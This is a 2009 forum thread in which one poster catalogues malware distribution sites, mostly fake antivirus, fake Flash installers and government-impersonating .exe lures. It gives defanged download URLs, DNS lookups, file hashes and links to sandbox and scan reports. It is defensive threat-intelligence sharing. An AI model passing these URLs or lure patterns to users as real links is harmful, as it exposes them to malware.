http://www.virustotal.com/analisis/dc5cd7ab47040323b0f10b69993d8778391f429d67aeb39e7ba036cdf64809e2-1253198389 1/41


teacherslounge.cn
6malwarescan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 17, 2009, 03:07:47 pm
Code: [Select]
hxxp://issuenews1.com/?pid=149&sid=46335d

$ dig issuenews1.com +short
89.248.174.61


hxxp://delete-all-virus05.com/download/Soft_149.exe

$ dig delete-all-virus05.com +short
89.248.174.61
206.217.201.136
78.47.230.33

http://www.virustotal.com/analisis/701d849d1a2500cf20b7229ad08698ee362c9f89365aadb566e921cffcaf3d66-1253196859 3/41



issuenews1.com
delete-all-virus05.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 18, 2009, 05:25:50 pm
Code: [Select]
hxxp://cnn-bcc2.com/?pid=71&sid=f3b6e0

$ dig cnn-bcc2.com +short
89.248.174.61

hxxp://antispywaretotalscan0.com/download/Soft_71.exe

$ dig antispywaretotalscan0.com +short
213.163.89.60
89.47.237.55
89.248.174.61

http://www.virustotal.com/analisis/556421211a74a309e865e7f610c5f7a5c067e01d30ddab3833247e9656cae63a-1253290351 2/41


cnn-bcc2.com
antispywaretotalscan0.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 21, 2009, 02:42:10 pm
Code: [Select]
hxxp://tohva.org/bestacti0n/

$ dig tohva.org +short
72.167.232.54

http://wepawet.iseclab.org/view.php?hash=871b1490c6b38e09a034642efdfa0641&t=1253543675&type=js

Code: [Select]
hxxp://99.225.203.135/d=tohva.org/0x3E8/view/setup.exe

http://www.virustotal.com/analisis/e1f365423df104c2bdeac819434314fa3c1c3e0dfefbe17cd422b3bc91de9546-1253532605



tohva.org


Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 21, 2009, 02:52:49 pm
Code: [Select]
hxxp://jeremy-kyle-now.cn/go.php?id=2006-71&key=0522c7066&p=1

$ dig jeremy-kyle-now.cn +short
206.217.201.136

hxxp://compurerthreats05.com/load/PersScan-b90b_2006-71.exe

$ dig compurerthreats05.com +short
78.46.118.2
78.46.201.89
78.46.251.41
88.198.81.153
88.198.120.177

http://www.virustotal.com/analisis/63dc178edfd235647ea2d492c331295b7bb70adc4273f2d9a48ada48f2d235ca-1253538847 2/41


jeremy-kyle-now.cn
compurerthreats05.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 22, 2009, 02:08:59 pm
Code: [Select]
hxxp://full-house-stuff.cn/go.php?id=2035&key=6165353a7&p=1

$ dig full-house-stuff.cn +short
206.217.201.136

hxxp://compurerthreats4.com/load/PersScan-e3dad99_2035.exe

$ dig compurerthreats4.com +short
88.198.81.153
88.198.120.177
78.46.118.2
78.46.201.89
78.46.251.41

http://www.virustotal.com/analisis/7c49f094bb254b3ab1840425bb15790c38c03425f535bbf146ce6a2bc112d271-1253604724 1/41


full-house-stuff.cn
compurerthreats4.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 23, 2009, 06:43:18 pm
Code: [Select]
hxxp://dolce-unt-gabbana.com/?pid=207&sid=de9f8f

$ dig dolce-unt-gabbana.com +short
89.248.174.61

hxxp://mycomputer-scanner1a.com/download/Soft_207.exe

$ dig mycomputer-scanner1a.com +short
206.217.201.240
213.163.89.60
89.47.237.55
89.248.174.61


http://www.virustotal.com/analisis/5cf130273b3ba0916ceae3ddeb38392063f12116c5772b1a219c2d8e7854d078-1253729193 4/41


dolce-unt-gabbana.com
mycomputer-scanner1a.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 24, 2009, 01:26:55 pm
Code: [Select]
hxxp://jennifer-hudson-site.com/?pid=118s20&sid=00562f

$ dig jennifer-hudson-site.com +short
89.248.174.61

hxxp://mycompscanner02.com/download/Soft_118s20.exe

$ dig mycompscanner02.com +short
89.47.237.55
89.248.174.61
206.217.201.240
213.163.89.60

http://www.virustotal.com/analisis/cb436af737004b0739b9e24e8a4434edeb454d1d6cdf1dfecd6004cdc7f69dcc-1253797532 2/41


jennifer-hudson-site.com
mycompscanner02.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 25, 2009, 06:00:39 pm
Code: [Select]
hxxp://baconguide.cn/go.php?id=2015&key=ace6725ec&p=1

$ dig baconguide.cn +short
206.217.201.136

hxxp://computeron-linescan06.com/load/Alpha-Scan-ff6_2015.exe

$ dig computeron-linescan06.com +short
188.40.61.236
88.198.81.153
91.212.127.202

http://www.virustotal.com/analisis/3d1305ef1b611dad6dba01d9877a753a95b4ec31955988fbe66552e3e877e24f-1253899121 4/41


baconguide.cn
computeron-linescan06.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 28, 2009, 04:16:51 pm
Code: [Select]
hxxp://hawthorneheights.cn/go.php?id=2002-08&key=9ba00f58f&p=1

$ dig hawthorneheights.cn +short
78.47.209.65


hxxp://internet-antivirus-scan.com/load/Alpha-Scan-e3dad9_2002-8.exe

$ dig internet-antivirus-scan.com +short
69.4.230.204
83.133.124.44

http://www.virustotal.com/analisis/525dc29f81abed75f22d914599928ccb166ee6fb22dfca2a28d2e8b4dc07c162-1254149651 1/41


hawthorneheights.cn
internet-antivirus-scan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 29, 2009, 12:20:13 pm
Code: [Select]
hxxp://benharpergals.com/?pid=162&sid=c3d08e

$ dig benharpergals.com +short
89.248.174.61

hxxp://mycompscanner42.com/download/Soft_162.exe

$ dig mycompscanner42.com +short
206.217.201.240
213.163.89.60
89.248.174.61

http://www.virustotal.com/analisis/239dcdf0d3583c4df2a7dd46de5bcab821bed9dfeb51ac6f7f31d5037a1009ef-1254226320 2/41


benharpergals.com
mycompscanner42.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 29, 2009, 05:59:00 pm
Code: [Select]
hxxp://www.irs.gov.vdslprot1.com/fraud_application/directory/tax-statement.exe

$ dig www.irs.gov.vdslprot1.com +short
94.21.144.203
94.196.133.190
190.46.93.230
190.190.209.211
74.3.203.93
77.22.125.13
77.222.224.108
77.254.215.47
78.131.54.255
79.109.149.131
85.136.96.131
89.74.19.174
91.195.98.36
93.103.232.126
94.21.106.13

http://www.virustotal.com/analisis/6f1538b95bbaa372eaf78ff3ec6b17505820bda5f1b573393ce0da033fd82717-1254235507 1/41


vdslprot1.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 01, 2009, 02:27:00 pm
Code: [Select]
hxxp://www.aghdg.us/setup.exe

$ dig www.aghdg.us +short
98.131.253.58

http://www.virustotal.com/analisis/78e7c936417e8ada7227fd9b6fcb42093ee68b443d873712fa0609ee47eea5d4-1254403628 7/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10971394&cs=9FC0D446CFFF947467AA836D66BCA8DC



aghdg.us
updateadvanced.org

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 01, 2009, 03:54:33 pm
Code: [Select]
hxxp://my-garden-state.com/?pid=70&sid=d6a3f1

$ dig my-garden-state.com +short
89.248.174.58

hxxp://pc-scanner16.com/download/Soft_70.exe

$ dig pc-scanner16.com +short
91.212.127.202
213.163.89.60
89.248.174.58

http://www.virustotal.com/analisis/0815bdbb6dec1837b4dba5b822f77739fecac39bdadfe8cd41b71856db7fb9cd-1254408626 3/41


my-garden-state.com
pc-scanner16.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 01, 2009, 04:56:16 pm
Code: [Select]
hxxp://www.irs.gov.vsdftpp.mobi/fraud_application/directory/tax-statement.exe

$ dig  www.irs.gov.vsdftpp.mobi +short
92.84.36.228
94.21.143.172
95.133.174.107
201.139.75.79
62.238.200.208
77.254.156.161
78.59.16.182
79.113.98.156
79.116.207.244
79.117.175.238
81.203.251.235
83.27.110.30
83.165.184.146
85.136.128.59
92.1.141.193

http://www.virustotal.com/analisis/04bfba6f6e136b1006fa28f36ca4c40382b6c939e8e83d713e6f1be6f7e7c6c3-1254411591 9/41


vsdftpp.mobi

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 01, 2009, 09:30:16 pm
Code: [Select]
hxxp://moviemidifiles.net/CartoonPorn-Movies.40054.exe

$ dig moviemidifiles.net +short
66.197.132.22

http://www.virustotal.com/analisis/a6640fd355626f89355dae2bd5d09189353c544646b90ee39c1e9a4533a5b084-1254432146 10/41


moviemidifiles.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 02, 2009, 01:17:20 am
Code: [Select]
hxxp://adobeflashupdates.com/install_flash_player.exe

$ dig adobeflashupdates.com +short
91.211.224.168

http://www.virustotal.com/analisis/a501ecd7e6e78ead459d8e194140456e71421a8948ce80305d4f92728414ac56-1254444388 10/41


adobeflashupdates.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 02, 2009, 03:13:18 pm
Code: [Select]
hxxp://the-offspring.cn/?pid=216&sid=2cb766

$ dig the-offspring.cn +short
89.248.174.58

hxxp://pc-scan23.com/download/Soft_216.exe

$ dig pc-scan23.com +short
213.163.89.60
89.248.174.58
91.212.127.202
188.40.50.232

http://www.virustotal.com/analisis/8490ed7776c78e87c865aca2693a627b775a6781ecf6f5777df5ace90dccd4ac-1254493452 5/41


the-offspring.cn
pc-scan23.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 09, 2009, 02:31:31 pm
Code: [Select]
hxxp://getfreediscounts.cn/?pid=202&sid=c380a2

$ dig getfreediscounts.cn +short
204.12.226.171

hxxp://bestspywarescanner05.com/download/Soft_202.exe

$ dig bestspywarescanner05.com +short
213.163.89.59
204.12.226.171

http://www.virustotal.com/analisis/bd5865c8b2f8d2f40194df88c1a40840f3b18146bac51349ea645203c38fc65f-1255098228 3/41


getfreediscounts.cn
bestspywarescanner05.com



Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 12, 2009, 03:52:55 pm
Code: [Select]
hxxp://disturbedweb0.com/?pid=71&sid=f3b6e0

$ dig disturbedweb0.com +short
204.12.226.171


hxxp://yourpcscanner09.com/download/Soft_71.exe

$ dig yourpcscanner09.com +short
91.213.126.103
204.12.226.171
206.217.201.241

http://www.virustotal.com/analisis/9a909b16284a6b23f397af963f15dc3ebe51b855a96e48172e4267afe3c789fb-1255361926 5/41


disturbedweb0.com
yourpcscanner09.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 12, 2009, 11:48:53 pm
Code: [Select]
hxxp://md-multimedia-data.com/50.Cent.-.Baby.By.Me.(Full.CDS).2009.45026.exe

$ dig md-multimedia-data.com +short
66.197.132.22

http://www.virustotal.com/analisis/f535b9af0189f3246360482a0f0b30b1b585e8aac8f9f05e6addc1d61488952b-1255390879 5/41


md-multimedia-data.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 21, 2009, 05:39:38 pm
Code: [Select]
hxxp://checkwindowsupdate.com/?all=71

$ dig checkwindowsupdate.com +short
88.198.233.228

hxxp://91.212.127.200/setup.exe

http://www.virustotal.com/analisis/19bbdd415974a87f192a1139029f5c5f238d2082423f93808b7692696fc7e492-1256146394 4/41


checkwindowsupdate.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 21, 2009, 09:22:32 pm
Code: [Select]
hxxp://greattubesusa.com/xplays.php?id=45082

$ dig greattubesusa.com +short
216.240.143.7

hxxp://multiairservice.com/flash-HQ-plugin.45082.exe

$ dig multiairservice.com +short
64.191.103.86

http://www.virustotal.com/analisis/69557c5c6b45992434f9ba4d1c8e5b4a1e72800d622d223770151b3d787c2a7f-1256159776 4/41


greattubesusa.com
multiairservice.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 21, 2009, 11:12:03 pm
Code: [Select]
hxxp://stortfordaircadets.org.uk/flash/pdf.php

$ dig stortfordaircadets.org.uk +short
83.170.122.1

http://wepawet.iseclab.org/view.php?hash=6d1473d78da59542e4b4e92b61d1d41e&t=1256128140&type=js


Code: [Select]
hxxp://stortfordaircadets.org.uk/flash/exe.php?x=flash

$ dig stortfordaircadets.org.uk +short
83.170.122.1

http://www.virustotal.com/analisis/22e5542569911f89a87f010b4219a59e84fd9855bafd41a7e0cc3c391cd0aaa4-1256159360 12/41


stortfordaircadets.org.uk

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 23, 2009, 03:54:41 pm
Code: [Select]
hxxp://wbavv.com/docs/load.php?e=pdf

$ dig wbavv.com +short
91.212.127.225

file op.exe

http://www.virustotal.com/analisis/5955a39339af868f83fafa43770c13b765f46c31ceb3f528adc06ba1a4c59887-1256310499 1/40

http://anubis.iseclab.org/?action=result&task_id=1bac42b892f109094019f0007958c224e


wbavv.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on October 27, 2009, 03:51:09 pm
Code: [Select]
hxxp://devline.se/6/

$ dig devline.se +short
195.74.37.190

http://wepawet.iseclab.org/view.php?hash=127a4e09ef625bab7692d4c79425ae69&t=1256658918&type=js

Code: [Select]
hxxp://98.204.66.255/pid=1000/view/setup.exe
[/cpde]

http://www.virustotal.com/analisis/65ab16df91cc5b0e8dfdfef2b28cd507f4cc388f3f905d2a5302dffe0e48ad30-1256614006 14/41

[b]
devline.se
[/b]
Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 02, 2009, 01:26:46 pm
Code: [Select]
hxxp://vivilan.cn/soft/surprise.exe

$ dig vivilan.cn +short
212.150.164.80

http://www.virustotal.com/analisis/8f753cbb1ddc3edda4a0b4ec0ce14475c2ed5e5890864f1d31ea8eefa28d01b2-1257097683 10/41


vivilan.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 03, 2009, 09:27:20 pm
Code: [Select]
hxxp://go-guardmypc.com/build7_172.php?cmd=getFile&counter=1&p=p52dcWlral%2FCj8bYbodyh1ik12qZVp%2FZatrau4FdlJ%2FJnsWYe3lwWqyopHaXXpqaaWWQaWlpyFPVpJHaotahk1ealXOL1dZ2Y2Zua2prbXCXZorPeKKcqaJ1ip22mZ3LapSWmGhpaWucmJU%3D

$ dig go-guardmypc.com +short
88.198.239.163

http://www.virustotal.com/analisis/8bf5ae477be526dd61f92805e6e39f808668804795a2699b1e2e6b5d4b24ebe2-1257283240 2/41


go-guardmypc.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 03, 2009, 11:11:38 pm
Code: [Select]
hxxp://supermediatool.com/flash-HQ-plugin.40072.exe

$ dig supermediatool.com +short
95.211.8.20

http://www.virustotal.com/analisis/5a6493098239d79e1a624cdab5356d03e9e12335ab2f0d4f35fb58fd15799052-1257289528 6/41


supermediatool.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 06, 2009, 04:25:09 pm
Code: [Select]
hxxp://implementmultimedia.net/flash-HQ-plugin.40072.exe

$ dig implementmultimedia.net +short
95.211.8.87

http://www.virustotal.com/analisis/1cbf4b16be07868073c39e972c0b787cec2d3168898be20cbc3485be8302ce4f-1257524309 7/40


implementmultimedia.net


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 06, 2009, 10:44:24 pm
Code: [Select]
hxxp://nt202.cn/cgi-bin/jl/jloader.pl?r=q/q1.dll

$ dig nt202.cn +short
174.120.6.156

http://www.virustotal.com/analisis/33ade50414bba8a5c271011f8ab3a8c5c3df580c600242f019d2b24f96d12c51-1257546584 5/40


nt202.cn


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 08, 2009, 11:56:08 am
Code: [Select]
hxxp://8000msn.cn/2009addown.cn/200903.exe

$ dig 8000msn.cn +short
61.174.59.9

http://www.virustotal.com/analisis/4bfd03b60593672fb122f8fe94697f8fa808386b517641d4a29412a74f7cac39-1257620825 21/40


8000msn.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 10, 2009, 11:22:18 pm
Code: [Select]
hxxp://emptymultimediaplugin.net/flash-HQ-plugin.40070.exe

$ dig  emptymultimediaplugin.net +short
95.211.8.87

http://www.virustotal.com/analisis/b455d65c15c2d1657a545da1d137249b25cb85167f3a4efbdaa82ebcec45437a-1257895085 7/41


emptymultimediaplugin.net

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 12, 2009, 02:48:00 pm
Code: [Select]
hxxp://nacha.org.tttteack.co.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.fffazss.me.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.tttteacx.me.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.fffazsf.co.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.tttteacg.co.uk/ACHNetwork/Unauthorized/report.exe
hxxp://nacha.org.redaczxj.co.uk/ACHNetwork/Unauthorized/report.exe

$ dig nacha.org.tttteack.co.uk +short
113.252.50.242
123.195.226.68
190.27.86.115
190.44.63.164
212.96.58.204
38.118.55.250
59.7.103.37
77.28.223.152
83.4.229.89
83.4.245.9
88.216.136.50
93.105.25.184
95.68.73.27
95.154.204.231
96.32.137.202

http://www.virustotal.com/analisis/52cb3e1c19872a35582f98cf1057b5aba8195508b2e2a6bc2b70dc4093ec22e2-1258036974 14/41


fffazsa.me.uk
fffazsa.org.uk
fffazsf.org.uk
fffazss.me.uk
redaczxj.co.uk
redaczxm.me.uk
redaczxn.co.uk
redaczxs.co.uk
tttteacb.co.uk
tttteacb.me.uk
tttteacf.org.uk
tttteacg.co.uk
tttteack.co.uk
tttteack.org.uk
tttteacx.co.uk
tttteacx.me.uk


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 16, 2009, 10:07:55 pm
Code: [Select]
hxxp://greatfilearea.com/TVPL.45206.exe

$ dig greatfilearea.com +short
95.211.8.87

http://www.virustotal.com/analisis/bcd9c093e9301d6d53d2a2d1ed6e0f5aa9413d1f5194a4618f2b8a70f7e4efdb-1258408768 5/41


greatfilearea.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 19, 2009, 03:19:02 pm
Code: [Select]
hxxp://75.132.134.104/d=reddevilsmcturkey.com/0x3E8/view/console=yes/setup.exe

http://www.virustotal.com/analisis/729a9964601580055618ea37aff54a8b90b85dfb81826ebedfca69323a8ab58c-1258643987 26/41
Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 20, 2009, 04:08:24 pm
Code: [Select]
hxxp://SOMETHING.BLANKED_OUT.com.verzzm.co.uk/webmail/settings/flashinstaller.exe

$ dig SOMETHING.BLANKED_OUT.com.verzzm.co.uk +short
24.139.111.53
41.140.12.94
41.250.51.69
123.238.64.50
186.82.74.161
189.194.234.28
189.195.90.188
190.6.231.17
190.34.19.5
190.165.60.231
200.92.130.32
201.164.185.31
201.165.78.197
201.227.63.110
24.42.38.115

http://www.virustotal.com/analisis/664a07e231e71235d4e852b43def0c758126fc07b6a1887c3981c44b568850dc-1258732566 19/41


verzzm.co.uk


Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 20, 2009, 04:12:28 pm
Code: [Select]
hxxp://multimedia0serve.net/flash_player.40004.exe

$ dig multimedia0serve.net +short
95.211.8.87

http://www.virustotal.com/analisis/a06c97d90d8217fe489ee271bad317b474b82c3127ed6ae3c3808629888c5153-1258725152 6/41


multimedia0serve.net
Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 23, 2009, 02:22:30 pm
Code: [Select]
hxxp://76.27.180.212/d=www.firststategymnastics.com/0x3E8/view/console=yes/setup.exe

http://www.virustotal.com/analisis/bbb0187a775a97fd2dc82826341b48edddbe5b01f243e7fbfd2605c5b8361940-1258986036 9/41
Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 23, 2009, 10:11:14 pm
Code: [Select]
hxxp://statements.ssa.gov.fawaazf.be/acu/IPS_INTR/statement.exe

$ dig statements.ssa.gov.fawaazf.be +short
58.191.168.106
82.239.102.188
114.47.118.200
121.115.216.194
186.104.40.95
189.78.30.193
189.111.21.92
190.35.68.13
190.164.187.48
190.247.140.107
200.112.82.23
201.13.160.165
201.42.86.54
201.68.198.205
220.66.118.214

http://www.virustotal.com/analisis/20562828a60bf4ca66ee8121bcfb659daa81d4da94ffc4fed244ec702ae00eaf-1259014141 8/41

http://www.threatexpert.com/report.aspx?md5=b01b74ca78b4f405c575596473d8e4fd


fawaazf.be

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 24, 2009, 12:07:51 am
Code: [Select]
hxxp://199.0.198.210/d=gratisprogram.no/0x3E8/view/console=yes/setup.exe

$ md5sum setup.exe
1922fc33dff9f84de1cf23a03e6dd2b7  setup.exe

http://www.virustotal.com/analisis/b182443c0cc791f02a7b8a0e5e535e2d5ebb08bd65a5c0909439ab8555bbe3af-1259000878 14/41

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 24, 2009, 05:23:11 pm
Code: [Select]
hxxp://archive204975674.hlrtfeu.com/photo-hosting/PhotoArchive.exe

$ md5sum PhotoArchive.exe
15eee9b83ce227cde6c3153cb8761808  PhotoArchive.exe

$ dig archive204975674.hlrtfeu.com +short
222.131.142.214
60.52.52.118
113.10.46.229
117.242.113.115
121.96.106.59
187.44.253.162
189.196.17.219
190.34.51.100
190.53.8.98
190.53.136.29
190.128.153.40
190.142.63.143
190.225.9.54
201.226.241.26
210.89.36.19

http://www.virustotal.com/analisis/381c37778605699172d8c290c19345db04233531f8e4d4570570de5f2271f06c-1259083188 10/41


hlrtfeu.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on November 30, 2009, 04:26:30 pm
Code: [Select]
hxxp://graphwebgo.cn/setup/setup.exe

$ dig graphwebgo.cn +short
212.117.169.163

$ md5sum setup.exe
4e6349ea8c5c2045c10e33a25b9c4844  setup.exe

http://www.virustotal.com/analisis/1974f10da5f13ba9132cc14243daee9285e2a0bd397544cf25bed4c095920d0e-1259597534 1/40

http://www.threatexpert.com/report.aspx?md5=4e6349ea8c5c2045c10e33a25b9c4844


graphwebgo.cn


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 01, 2009, 12:10:03 pm
Code: [Select]
hxxp://best-scan004.com/download/Antivir-1370821_2002-8.exe

$ dig best-scan004.com +short
67.215.66.132
96.9.180.102
78.47.230.38

$ md5sum Antivir-1370821_2002-8.exe
b9fb9c9318972d5f2f38a37520fdbcad  Antivir-1370821_2002-8.exe

http://www.virustotal.com/analisis/1de1e284f62ec9837ab999d280cb6106d5c912407200fbd5b0f804392323cb2a-1259668583 6/41

http://anubis.iseclab.org/?action=result&task_id=1d4c1155c65e5f9a47d0ff7595abb24c1&format=html


best-scan004.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 01, 2009, 12:13:23 pm
Code: [Select]
hxxp://arc_iduwrs473.orange-llc.com/page-images/archives/PhotoArchive.exe

$ dig arc_iduwrs473.orange-llc.com +short
80.74.157.11

$ md5sum PhotoArchive.exe
6788cdd64bda0f4f4967383481440972  PhotoArchive.exe

http://www.virustotal.com/analisis/816e019336946a8bcf27cdb19bddae2dcd43029e7c6aa168769f3d97111e1b24-1259667921 14/41


orange-llc.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 01, 2009, 09:20:17 pm
Code: [Select]
hxxp://bestmultimedialist.net/flash-HQ-plugin.45204.exe

$ dig bestmultimedialist.net +short
95.211.8.119

$ md5sum flash-HQ-plugin.45204.exe
6f3015d3a4c7e3516933f97aa91104f2  flash-HQ-plugin.45204.exe

http://www.virustotal.com/analisis/127ee24999148c0a45bdf145303c4a5e33a0e852172492bf24465edf68e0a1e2-1259701841 0/41
https://cwsandbox.org/?site=1&page=details&id=971692&password=midhpmwhls
http://anubis.iseclab.org/?action=result&task_id=1d9b8c18a337de714492edc0fc2c4f9a3&format=html


bestmultimedialist.net


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 02, 2009, 11:07:25 pm
Code: [Select]
hxxp://allmultimediatools.com/flash-HQ-plugin.45209.exe

$ dig allmultimediatools.com +short
95.211.8.119

$ md5sum flash-HQ-plugin.45209.exe
e82e2b3ad956ce73ba32f45074f6a1b2  flash-HQ-plugin.45209.exe

http://www.virustotal.com/analisis/d6a162926ac79b18c03d70cd378c2d9ec3fa7d4840622148d1d8b9ef3daeebda-1259794988 1/41
https://cwsandbox.org/?page=report&analysisid=1350162&password=xknbioswmq
http://anubis.iseclab.org/?action=result&task_id=16b0a6957b7316284612b000cd4c663e0
http://www.threatexpert.com/report.aspx?md5=e82e2b3ad956ce73ba32f45074f6a1b2


allmultimediatools.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 03, 2009, 03:09:31 am
Code: [Select]
hxxp://66.32.8.226/d=theroamingjew.com/0x3E8/view/console=yes/setup.exe

$ md5sum setup.exe
64501247b35d1381ccfcb7a8ee33feea  setup.exe

http://www.virustotal.com/analisis/73a25f99e584e474cf8719e54a178648548fd34171e1c52bc020c9d129f2a6f5-1259737778 19/40
Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 03, 2009, 11:40:11 pm
Code: [Select]
hxxp://freehostforyou.cn/hot.exe

$ dig freehostforyou.cn +short
124.217.239.157

$ md5sum hot.exe
90761e30474db84b18051bf0031c32eb  hot.exe

http://www.virustotal.com/analisis/5b0371ee54d2abe16982f674e3d8f799a4cd5cc95a81dc9b4c5bd459364586a3-1259882812 3/41
http://anubis.iseclab.org/?action=result&task_id=154e9863ce80615e491d7cea75c3b74a0
https://cwsandbox.org/?page=report&analysisid=1363108&password=dwdowgqeyv


freehostforyou.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 06, 2009, 10:02:07 pm
Code: [Select]
hxxp://altstream.cn/p2/

$ dig altstream.cn +short
193.104.94.45

redirect too

Code: [Select]
hxxp://freebigutilites.com/flash-plugin_update.40028.exe

$ dig freebigutilites.com +short
69.10.41.147

$ md5sum flash-plugin_update.40028.exe
0d9905ef33557bcecfa80ef615406424  flash-plugin_update.40028.exe

http://www.virustotal.com/analisis/f38fcce2ac8d754715c5e0c93c9b32fc177c34faf5972b46c4a550265105e3e0-1260136390 3/41
http://anubis.iseclab.org/?action=result&task_id=18b93f934b3cb9a047d4da5fbf882390e&format=html
http://www.threatexpert.com/report.aspx?md5=0d9905ef33557bcecfa80ef615406424
https://cwsandbox.org/?page=report&analysisid=1673086&password=shiedtogti


altstream.cn
freebigutilites.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 07, 2009, 04:41:26 pm
Code: [Select]
hxxp://ms-top-antivirus.cn/download/Antivir-d97b01e_2002-8.exe

$ dig ms-top-antivirus.cn +short
78.47.230.38
93.174.93.117
88.198.160.57
204.12.220.170

$ md5sum Antivir-d97b01e_2002-8.exe
072c7723f5e1df595f9482651b2a74f8  Antivir-d97b01e_2002-8.exe

http://www.virustotal.com/analisis/9a5601304304d6ca50f687929bc2bc4014bde5e9da7f5cbc4a567c932b4500f6-1260203800 1/41
https://cwsandbox.org/?page=report&analysisid=1735689&password=yoxiynzyfu
http://anubis.iseclab.org/?action=result&task_id=11980a90ae92a48e4a122172c78f3b6b7


ms-top-antivirus.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 08, 2009, 05:59:42 pm
Code: [Select]
hxxp://secure-zone-021.cn/download/Antivir-fdbd66_2002-8.exe

$ dig secure-zone-021.cn +short
93.174.93.117
204.12.220.170
78.47.230.38
88.198.160.57

$ md5sum Antivir-fdbd66_2002-8.exe
644f14dc75da9f0df47ca623a99e56b4  Antivir-fdbd66_2002-8.exe

http://www.virustotal.com/analisis/0bbbe602043466f009b069fc76606fee9fe915d497e50b0403cca283d4713b06-1260294894 3/41


secure-zone-021.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 08, 2009, 07:32:28 pm
Code: [Select]
hxxp://skytechsoftware.com/flash-HQ-plugin.45204.exe

$ dig skytechsoftware.com +short
69.10.41.147

$ md5sum flash-HQ-plugin.45204.exe
515d5f1f160f8d2689814dd29bfbdbbb  flash-HQ-plugin.45204.exe

http://www.virustotal.com/analisis/f672541a357a3755e77f0d237de4681f0c3182b1d2226f535e52aa2ef12e8f8f-1260300245 3/41
http://anubis.iseclab.org/?action=result&task_id=1b46c1df1d0f6b124f5ca4d68aba0db03
http://www.threatexpert.com/report.aspx?md5=515d5f1f160f8d2689814dd29bfbdbbb


skytechsoftware.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 10, 2009, 12:32:24 am
Code: [Select]
hxxp://puretechstorage.net/Rihanna.-.Rated.R.45026.exe

$ dig puretechstorage.net +short
64.120.141.99

$ md5sum Rihanna.-.Rated.R.45026.exe
2116ab12155c2d54ab9b087e6bf2c612  Rihanna.-.Rated.R.45026.exe

http://www.malwaredomainlist.com/mdl.php?search=64.120.141&colsearch=All&quantity=50
http://www.virustotal.com/analisis/f77afe91cad95be623c4d3dba6ee2b2925c98681e1516867f93bbc038b3fd9e1-1260404932 5/41
https://cwsandbox.org/?page=report&analysisid=1765456&password=esbuirbnov
http://anubis.iseclab.org/?action=result&task_id=19c3e59f7fd0117941d610f93c1b3a71f&format=html
http://www.threatexpert.com/report.aspx?md5=2116ab12155c2d54ab9b087e6bf2c612


puretechstorage.net


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 10, 2009, 02:49:55 pm
Code: [Select]
hxxp://top2009securityv.cn/download/Antivir-a5320_2005-10.exe

$ dig top2009securityv.cn +short
93.158.114.63
204.12.252.101
93.174.93.117
93.174.93.34
88.198.160.57
89.248.162.141

$ md5sum Antivir-a5320_2005-10.exe
f506baa16dc0a58db47d53f57681f94a  Antivir-a5320_2005-10.exe

http://www.virustotal.com/analisis/fddb822f707833523b35713c599dd91d4b3783f8d63ccdb0c747a0442c3c614c-1260456119 8/41
http://anubis.iseclab.org/?action=result&task_id=13724dfb9e15e03c4497c68cb5b0d9b53
https://cwsandbox.org/?page=report&analysisid=1770793&password=qrimowfbqi


top2009securityv.cn


Title: Re: Mr Clean's dirt
Post by: Mr Clean on December 10, 2009, 04:08:00 pm
Code: [Select]
